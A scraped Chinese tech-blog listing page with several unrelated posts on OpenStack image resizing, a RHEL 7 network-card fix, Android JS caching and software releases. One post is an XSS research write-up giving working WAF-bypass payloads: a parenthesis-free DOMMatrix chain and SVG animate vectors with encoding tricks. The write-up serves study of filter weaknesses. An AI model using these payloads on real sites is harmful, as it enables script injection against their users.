首页 文章 精选 留言 我的

精选列表

搜索[镜像无法拉取],共10000篇文章
优秀的个人博客,低调大师

openstack 镜像自动扩容 resize拉伸

The simplest way to support this in your image is to install the cloud-utils package (contains the growpart tool for extending partitions), the cloud-initramfs-growroot package (which supports resizing root partition on the first boot), and the cloud-init package into your image. With these installed, the image performs the root partition resize on boot. For example, in the /etc/rc.local file. These packages are in the Ubuntu and Debian package repository, as well as the EPEL repository (for Fedora/RHEL/CentOS/Scientific Linux guests). If you cannot install cloud-initramfs-tools, Robert Plestenjak has a github project called linux-rootfs-resize that contains scripts that update a ramdisk by using growpart so that the image resizes properly on boot. If you can install the cloud-utils and cloud-init packages, we recommend that when you create your images, you create a single ext3 or ext4 partition (not managed by LVM).

优秀的个人博客,低调大师

火绒推出强力卸载工具:免费广

火绒安全宣布正式推出全新工具 ——“火绒强力卸载(Huorong Uninstaller)”Beta 版,计划于 2026 年 1 月 8 日上线。 根据介绍,“火绒强力卸载”包含以下特性: 支持独立安装、独立使用,无需依赖其他程序。 提供“普通卸载”、“一键卸载”两种操作模式,满足常规清理与深度卸载的差异化需求,(两种卸载模式暂不支持卸载WinAPP)。 具备软件安装全程行为监控能力,安装行为的记录效果与主流同类产品基本一致,为后续精准卸载提供依据(在 GeekUninstaller、TotalUninstall 等国外同类软件中,类似功能通常需升级至收费版本才可使用) 通过“内置规则库+非行为记录”的双重方式,扫描并清理软件卸载后的残留文件、注册表项等冗余数据 支持软件按“全部/不受欢迎/Win应用/系统组件”多维度分类,同时展示软件大小、安装时间、使用频率,方便快速定位目标软件 涵盖操作日志查询、基础设置等功能;内置问题反馈通道,可直接跳转论坛进行反馈 拒绝收费功能阉割、告别弹窗广告与软广打扰,所有核心卸载、残留清理、安装监控功能目前免费开放,让用户享受纯粹的工具体验 秉持“轻便、简单、专注”的产品理念,优化底层架构,运行时资源占用低,不影响电脑日常操作,老旧设备也能流畅使用 预设安全机制,禁止一键卸载安全软件,避免误操作风险;采用“后置解除占用”技术,而非直接内核解除,防止操作超限引发系统问题,兼顾高效与安全 无论是“新手”亦或是“老手”,都能通过简洁的界面快速上手,功能贴合不同需求层级

优秀的个人博客,低调大师

🔥代码流程引擎 FlowLong 1.1.1 发布

开源地址:https://gitee.com/aizuda/flowlong 开源地址:https://github.com/aizuda/flowlong 官网文档:https://flowlong.aizuda.com 支持全流程操作监听,仅 8 张表实现整个流程引擎(更符合中国人的思维模式设计),截至当前近 300 家企业自用登记接入使用。300 多家企业包括,国家计算中心,电信 等国企已上车,你还在等什么呢? 开源登记使用名单如下,企业版用户暂不公开 https://gitee.com/aizuda/flowlong/issues/IB5K4V Flowlong 1.1.1 主要亮点 feat: 新增重新加载模型测试用例 feat: 新增解析模型测试用例 feat: 节点模型新增基础信息克隆方法 fix: 修复节点跳转归档子节点逻辑 opt: 优化实例模型缓存加载逻辑 opt: 优化抄送任务并行分支执行逻辑 opt: 计算时间差至少设置为0优化

优秀的个人博客,低调大师

括号和svg的xss构造利用

前言 最近我学习了一些新的xss技巧在这里分享给大家! 0x01 JavaScript without parentheses using DOMMatrix 背景 以前我们有两个解决xss不带括号的方法但是都有缺陷: 我们可以使用location=name来加载外部的代码,但是Safari不支持,另外还可以用onerror=alert;throw 1来实现xss,但是现在大多数的waf都会过滤throw 1,因此今天我们就来介绍以下第三种方法。 DOMMatrix 题目的伪代码: 根据上面的要求我们不能使用"'()[]\%;等字符,对于函数由于少了括号,我们只能用toString/valueOf函数但是不能传参数。由于字符的受限我们不能提取字符串的一部分。我们只能获取toString值的第一个字符,例如: 解释一下为什么获取的字符是/因为创建RegExp对象的toString是/(?:)/所以获取的第一个字符就是/。 由于我们不能使用带括号的函数,因此我们需要找一个对象,该对象toString是一个带括号的函数调用,就是DOMMatrix,例如: 我们可以利用DOMMatrix来生成一个包含括号的字符串,该字符串为带有参数的矩阵函数1, 0, 0, 1, 0, 0,但是有两个问题:1.我们需要控制被调用的函数;2.我们需要控制传递给函数的参数。我们可以通过将函数分配给矩阵变量来解决第一个问题: x=new DOMMatrix; matrix=alert; 对于第二个问题:由于DOMMatrix构造函数返回的矩阵对象,中有一个属性a,该属性使我们能够控制传递给该函数的第一个参数,其他参数依次类推: 综上所述,我们可以利用DOMMatrix来构造payload调用alert(1377): 到此结束了吗,没有!有时候我们需要执行任意代码,因此我们继续介绍怎么怎么执行任意代码。 首先我们传递到矩阵函数的参数必须是数字,这个可以用String.fromCharCode来把数字转化成字符;其次我们必须给矩阵的每个属性都赋值,因为其默认是0或1,在执行函数时将会报错;如果字符的位置都占满了6个属性,我们需要再次创建对象使用位置分配。 最终的payload如下: 构成的字符串如下: javascript:a=matrix(106, 97, 118, 97, 115, 99)+matrix(114, 105, 112, 116, 58, 32)+matrix(97, 108, 101, 114, 116, 40)+matrix(49, 51, 51, 55, 41, 59);location=a;void 1 我们使用location两次,一次生成字符串,第二次将字符串赋值给location。其中void 1阻止浏览器写入所述第二位置分配为HTML。 0x02 SVG animate XSS vector 背景 一般对于现在的waf都可以提取标签的属性值,然后检验其中是否有恶意代码达到屏蔽的作用,但是我们可以用<animate>标签的values属性中间插入JavaScript URL和多个值来绕过waf,例如: <animate values="http://safe-url/?;javascript:alert(1);C"> 这样对于某些waf来说可能识别失败,并将上面的属性值视为安全的URL。 这项研究的作者提出了一个完美的XSS攻击媒介: <svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://safe-url?;javascript:alert(1);0" /><a id=xss><text x=20 y=20>XSS</text></a> 接下来我们将尝试将上面的payload缩短。 payload缩短 在开始之前,我们需要了解values和keyTimes属性之间的关系。 让我们看一下文档(https://svgwg.org/specs/animations/#KeyTimesAttribute),以了解什么是keyTimes: 以分号分隔的时间值列表,用于控制动画的步调。列表中的每个时间都对应于values属性列表中的一个值,并定义了何时在动画功能中使用该值。 "keyTimes"列表中的每个时间值都指定为0到1(含)之间的浮点值,代表动画元素的简单持续时间的比例偏移。 对于线性和样条动画,列表中的第一个时间值必须为0,列表中的最后一个时间值必须为1。与每个值关联的关键时间定义何时设置该值;值在关键时间之间进行插值。 为了更好地了解其行为,我们将创建一个滑动圆的动画(这里就不演示了感兴趣的可以自己尝试一下,将下面代码用浏览器打开即可): 在上面的示例中,发生了两个动画。圆从0滑到80,然后从80滑到120。我们减少中间keyTimes属性的次数越多(前者的值设置为0.5),动画的第一部分越快。但是,当该值减小到0时,动画的第一部分将被忽略,并且圆圈将从80滑动到120。这正是我们需要的: 我们要确保始终显示动画的第二部分(而始终忽略第一部分)。为此,设置了两个附加属性:repeatCount = indefinite –告诉动画继续播放,dur = 5s–持续时间(任何值都足够)。 让我们快速浏览一下文档(https://www.w3.org/TR/SVG11/animate.html),注意这两个属性是多余的: 如果动画不具有"dur"属性,则简单持续时间是不确定的。 代替无限重复5s动画,我们可以创建不重复的无限动画。这样,我们就可以摆脱dur属性(默认情况下将其设置为不确定的值),然后我们可以删除repeatCount。 对于下面的代码: 第一个动画不会发生(因此href属性不会设置为https://safe-url),而第二个动画会(href指向javascript:alert(1)并且将无限期地保留在那里)。这样,我们就可以缩小初始XSS攻击向量,如下所示: <svg><animate xlink:href=#xss attributeName=href keyTimes=0;0;1 values="http://isec.pl;javascript:alert(1);X" /><a id=xss><text x=20 y=20>XSS</text></a> Freeze the keyTimes 事实证明,这keyTimes不是唯一允许我们使用values属性列表中非第一个值的属性。由于我们想在后面走私javascript:alert(1),而不是一开始就走私,因此,最明显的解决方案是将其摆在最后。 SVG标准定义(https://developer.mozilla.org/zh-CN/docs/Web/SVG/Attribute/fill)了一个属性fill。它指定动画的最终状态是第一帧还是最后一帧。 <svg viewBox="0 0 120 25" xmlns="http://www.w3.org/2000/svg"> <circle cx="10" cy="10" r="10"> <animate attributeName="cx" dur=5s values="0 ; 80 " fill=remove /> </circle> </svg> 如果属性fill设置为"remove",则在动画结束时它将移回第一帧。圆从0滑到80,然后移回0位置。 <svg viewBox="0 0 120 25" xmlns="http://www.w3.org/2000/svg"> <circle cx="10" cy="10" r="10"> <animate attributeName="cx" dur=5s values="0 ; 80 " fill=freeze /> </circle> </svg> 如果将属性fill设置为freeze,则动画将保留最后一个动画帧的状态。圆从0滑到80,并停留在完成动画的位置80。这样,我们可以将我们javascript:alert(1)作为最后一个元素,并确保在动画结束时始终显示该元素。 这种解决方案有点棘手。在碰到最后一个元素之前,我们需要遍历第一个元素。我们不能忽略它; 但是,我们可以通过将动画的持续时间设置为非常短的值(例如:1ms),使第一个动画帧几乎可以被人眼忽略。 动画开始播放时,href属性将仅设置http://isec.pl为1毫秒,然后它将保持打开状态javascript:alert(1)。 <svg><animate xlink:href=#xss attributeName=href fill=freeze dur=1ms values="http://isec.pl;javascript:alert(1)" /><a id=xss><text x=20 y=20>XSS</text></a> 其他绕过WAF的技巧 混淆WAF的主要技巧是插入恶意javascript:alert(1)矢量作为URL的有效部分。尽管值必须用分号分隔,但我们仍可以轻松地构成一个有效的URL,在其中走私我们的javascript:alert(1)向量: values="http://isec.pl/?a=a;javascript:alert(1)"作为参数值。 values="http://isec.pl/?a[;javascript:alert(1)//]=test"作为参数名称。 values="http://isec.pl/?a=a#;javascript:alert(1)"作为哈希的片段。 values="http://;javascript:alert(1);@isec.pl"作为基本身份验证凭据(keyTimes变体) HTML编码 此外,我们允许对values属性内的任何字符进行HTML编码。这样,我们可能会更好地欺骗WAF规则。 <svg><animate xlink:href=#xss attributeName=href fill=freeze dur=1ms values="http://isec.pl;j&#97;v&#x61;script:alert(1)" /><a id=xss><text x=20 y=20>XSS</text></a> 由于HTML编码很方便,所以我们可能会使用一些额外的行为:允许某些字符出现在javascript:协议标识符之前。01-32范围内的每个ASCII值都可以使用。例如: <svg><animate xlink:href=#xss attributeName=href values="&#11;javascript:alert(1)" /><a id=xss><text x=20 y=20>XSS</text></a> <svg><animate xlink:href=#xss attributeName=href values="&#01;&#02;&#03;&#04;&#05;&#06;&#07;&#08;&#09;&#10;&#11;&#12;&#13;&#14;&#15;&#16;&#17;&#18;&#19;&#20;&#21;&#22;&#23;&#24;&#25;&#26;&#27;&#28;&#29;&#30;&#31;&#32;javascript:alert(1)" /><a id=xss><text x=20 y=20>XSS</text></a> 根据该项研究的作者观察表明,这些值根本不需要进行HTML编码(由于有效负载包含不可打印的字符,因此对它们进行了base64编码以提高可读性): PHN2Zz48YW5pbWF0ZSB4bGluazpocmVmPSN4c3MgYXR0cmlidXRlTmFtZT1ocmVmICB2YWx1ZXM9IgECAwQFBgcICQ0KCwwNCg4PEBESExQVFhcYGRobHB0eHyBqYXZhc2NyaXB0OmFsZXJ0KDEpIiAvPjxhIGlkPXhzcz48dGV4dCB4PTIwIHk9MjA+WFNTPC90ZXh0PjwvYT4= 0x03 总结 上面的这些payload可以绕过某些不严谨的waf,通过这次的学习对xss又有着更深的理解。 0x04 参考链接 https://portswigger.net/research/javascript-without-parentheses-using-dommatrix https://blog.isec.pl/xss-fun-with-animated-svg/ https://portswigger.net/research/svg-animate-xss-vector XSS跨站脚本攻击原理与实践(XSS攻击,指通过在页面注入恶意JAVASCRIPT代码,从而在用户浏览被注入恶意代码的页面时,控制用户的浏览器行为的一种攻击)

优秀的个人博客,低调大师

Red Hat 7.0 安装完后网卡

最近在VMware workstation 8上安装了RHEL 7.0 x64,但是显示没有网卡,ifconfig只显示lo设备 [root@localhost~]# ifconfig lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 0 (Local Loopback) RX packets 8 bytes 764 (764.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 8 bytes 764 (764.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 到/etc/sysconfig/network-scritps里发现只有lo这个设备 但是明明是有这块网卡的 [root@openstack ~]# lspci |grep -i eth 02:01.0 Ethernet controller: Intel Corporation 82545EM Gigabit Ethernet Controller (Copper) (rev 01) google了下,试了下面几种方式,都不行 1,开机删掉网卡 2,重启 3,开机后加网卡 4,重启,ifconfig还是只有lo ------------------------------- 1,开机删掉网卡 2,关机下加网卡 3,开机,还是不行 后来在下面两篇文章中看到原来是虚拟机vmx配置文件中少了一行配置 https://access.redhat.com/discussions/1120733 https://communities.vmware.com/thread/477988 1,关机, 2,移除网卡 3,添加网卡 4,往虚拟机vmx配置文件加ethernet0.virtualDev = "e1000" 5,开机,通过ifconfig能看到网卡 [root@openstack ~]# ifconfig ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.47.130 netmask 255.255.255.0 broadcast 192.168.47.255 inet6 fe80::20c:29ff:fe5f:8717 prefixlen 64 scopeid 0x20<link> ether 00:0c:29:5f:87:17 txqueuelen 1000 (Ethernet) RX packets 75 bytes 8456 (8.2 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 124 bytes 15417 (15.0 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 0 (Local Loopback) RX packets 8 bytes 764 (764.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 8 bytes 764 (764.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 附:RedHat 7.0 文档 https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/7/ 本文转自 taojin1240 51CTO博客,原文链接:http://blog.51cto.com/taotao1240/1680479,如需转载请自行联系原作者

优秀的个人博客,低调大师

Android微信下JS报错:对象

1.1.1 现象 发布新版本到服务器上后,点击一个按钮总是不执行相应的操作,将控制台信息输出出来后发现提示信息说没有找到相应的对象。 按钮的代码中调用了一个函数,这个函数在另外一个JS文件中,是新版本中增加的。因为是在Android手机上,没法联机调试,于是通过alert逐步定位,发现新加的函数确实没有。再通过链接打开对应的JS文件查看,发现确实也没有新增的函数,可是检查服务器上的JS文件,其内容是正确的。 另外,这个问题只在Android手机上出现,在iPhone下没有这个问题。 1.1.2 原因 在网上搜索,发现是Android下使用了缓存的JS文件,因为在HTML的Header中没有设置相应meta参数,导致Android下没有更新JS文件。 1.1.3 解决 强制Android刷新JS/CSS文件有两种方法: 方法一,设定Meta参数,强制不使用缓存 <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE"> <META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"> 这种方法适用于开发阶段,或开发、测试服务器上,对于生产环境不太适合,因为不使用缓存,终端用户的性能会受到影响。 方法二,为需要更新的CSS/JS文件链接后面增加版本号参数,这样Android客户端会认为是新的文件: <script src="/js/invitation.js?v=20150625"></script> 这种方法适用于生产环境。 本文转自 tywali 51CTO博客,原文链接:http://blog.51cto.com/lancelot/1774914,如需转载请自行联系原作者

资源下载

更多资源
Mario

Mario

马里奥是站在游戏界顶峰的超人气多面角色。马里奥靠吃蘑菇成长,特征是大鼻子、头戴帽子、身穿背带裤,还留着胡子。与他的双胞胎兄弟路易基一起,长年担任任天堂的招牌角色。

腾讯云软件源

腾讯云软件源

为解决软件依赖安装时官方源访问速度慢的问题,腾讯云为一些软件搭建了缓存服务。您可以通过使用腾讯云软件源站来提升依赖包的安装速度。为了方便用户自由搭建服务架构,目前腾讯云软件源站支持公网访问和内网访问。

Spring

Spring

Spring框架(Spring Framework)是由Rod Johnson于2002年提出的开源Java企业级应用框架,旨在通过使用JavaBean替代传统EJB实现方式降低企业级编程开发的复杂性。该框架基于简单性、可测试性和松耦合性设计理念,提供核心容器、应用上下文、数据访问集成等模块,支持整合Hibernate、Struts等第三方框架,其适用范围不仅限于服务器端开发,绝大多数Java应用均可从中受益。

Rocky Linux

Rocky Linux

Rocky Linux(中文名:洛基)是由Gregory Kurtzer于2020年12月发起的企业级Linux发行版,作为CentOS稳定版停止维护后与RHEL(Red Hat Enterprise Linux)完全兼容的开源替代方案,由社区拥有并管理,支持x86_64、aarch64等架构。其通过重新编译RHEL源代码提供长期稳定性,采用模块化包装和SELinux安全架构,默认包含GNOME桌面环境及XFS文件系统,支持十年生命周期更新。

用户登录
用户注册